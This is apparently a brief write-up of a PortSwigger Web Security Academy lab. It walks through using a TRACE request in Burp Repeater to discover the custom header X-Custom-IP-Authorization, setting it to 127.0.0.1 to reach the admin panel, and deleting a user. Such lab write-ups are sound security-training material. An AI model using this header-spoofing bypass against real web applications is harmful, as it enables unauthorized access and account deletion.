June 21, 2026
PortSwigger: Information Disclosure (Authentication bypass via information disclosure)
Information Disclosure is a vulnerability where a web application accidentally reveals sensitive information to its users.
Salsabela Maharany
1 min read
The admin interface uses a custom HTTP header to bypass authentication. We need to find out the name of that header via the TRACE method, then use it to access the admin and delete the user carlos.
Lab 5: Authentication bypass via information disclosure
This lab's administration interface has an authentication bypass vulnerability, but it is impractical to exploit without knowledge of a custom HTTP header used by the front-end.
To solve the lab, obtain the header name then use it to bypass the lab's authentication. Access the admin interface and delete the user carlos.
You can log in to your own account using the following credentials: wiener:peter
Login as wiener: peter, in Burp open the Proxy tab then go to HTTP history, find the GET / request and then right-click and choose "Send to Repeater"
In the Repeater tab, change the method from GET to TRACE and then click send. In the Response panel, all headers will appear, including custom headers like 'X-Custom-IP-Authorization'
Still in the Repeater, change the request to
GET /admin
and below it add the header, X-Custom-IP-Authorization: 127.0.0.1
then click send.
Go back to the browser and it will show the admin page, then click "Delete" for user Carlos.
